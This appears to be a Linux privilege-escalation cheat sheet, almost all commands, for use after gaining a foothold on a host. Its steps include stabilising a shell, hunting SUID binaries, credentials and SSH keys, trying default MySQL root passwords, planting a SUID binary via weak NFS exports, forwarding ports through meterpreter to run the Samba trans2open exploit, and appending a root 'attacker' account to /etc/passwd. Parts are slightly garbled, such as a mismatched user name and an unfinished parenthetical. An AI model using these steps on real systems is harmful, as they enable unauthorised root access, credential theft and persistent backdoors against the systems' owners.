Linux Privilege Escalation

Stable your shell:

python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='ls -lsaht --color=auto'
Ctrl + Z [Background Process]
stty raw -echo ; fg ; reset
stty columns 200 rows 200

Various Capabilities?

which gcc
which cc
which python
which perl
which wget
which curl
which fetch
which nc
which ncat
which nc.traditional
which socat


file /bin/bash
uname -a
cat /etc/*-release
cat /etc/issue

What Arch ?

file /bin/bash

uname -a

cat /etc/issue
cat /etc/*-release

Are we a real user?
sudo -l
ls -lsaht /etc/sudoers

Are any users a member of exotic groups?

groups <user>

Check out your shell’s environment variables.



cd /home/
ls -lsaht

Web Configs containing credentials?

cd /var/www/html/
ls -lsaht

SUID Binaries?

find / -perm -u=s -type f 2>/dev/null

GUID Binaries?

find / -perm -g=s -type f 2>/dev/null

SUID/GUID/SUDO Escalation:

start monitoring the system.
cd /var/tmp/
File Transfer --> pspy32
File Transfer --> pspy64
chmod 755 pspy32 pspy64

What does the local network look like?

netstat -antup
netstat -tunlp

Is anything vulnerable running as root?

ps aux |grep -i 'root' --color=auto

MYSQL Credentials? Root Unauthorized Access?

mysql -uroot -p
Enter Password:
root : root
root : toor
root :

look at etc:

cd /etc/
ls -lsaht
Anything other than root here?
• Any config files left behind?
→ ls -lsaht |grep -i ‘.conf’ --color=auto

• If we have root priv information disclosure - are there any .secret in /etc/ files?
→ ls -lsaht |grep -i ‘.secret’ --color=aut

SSH Keys for further compromise?

ls -lsaR /home/

Quick look in:
ls -lsaht /var/lib/
ls -lsaht /var/db/

Quick look in:
ls -lsaht /opt/
ls -lsaht /tmp/
ls -lsaht /var/tmp/
ls -lsaht /dev/shm/

File Transfer Capability?

which wget
which curl
which nc
which fetch (BSD)
ls -lsaht /bin/ |grep -i 'ftp' --color=auto

NFS? Can we exploit weak NFS Permissions?

cat /etc/exports

[On Attacking Machine]
mkdir -p /mnt/nfs/
mount -t nfs -o vers=<version 1,2,3> $IP:<NFS Share> /mnt/nfs/ -nolock
gcc suid.c -o suid
cp suid /mnt/nfs/
chmod u+s /mnt/nfs/suid
su <user id matching target machine's user-level privilege.>

[On Target Machine]
user@host$ ./suid

read, write and execute files?


Any exotic file system mounts/extended attributes?

cat /etc/fstab

Forwarding out a weak service for root priv (with meterpreter!):

Do we need to get a meterpreter shell and forward out some ports that might be running off of the Loopback Adaptor ( and forward them to any ( If I see something like Samba SMBD out of date on - we should look to forward out the port and then run trans2open on our own machine at the forwarded port.

Forwarding out netbios-ssn EXAMPLE:

meterpreter> portfwd add –l 139 –p 139 –r [target remote host]
meterpreter> background
use exploit/linux/samba/trans2open
set RPORT 139

Can we write as a low-privileged user to /etc/passwd?

openssl passwd -1
echo 'attacker:$1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.:0:0:attacker:/home/attacker:/bin/bash' >> /etc/passwd
su attacker


crontab –u root –l

Look for unusual system-wide cron jobs:
cat /etc/crontab
ls /etc/cron.*

Bob is a user on this machine. What is every single file he has ever created?

find / -user miguel 2>/dev/null

Any mail? mbox in User $HOME directory?

cd /var/mail/
ls -lsaht





Linux Privilege Escalation: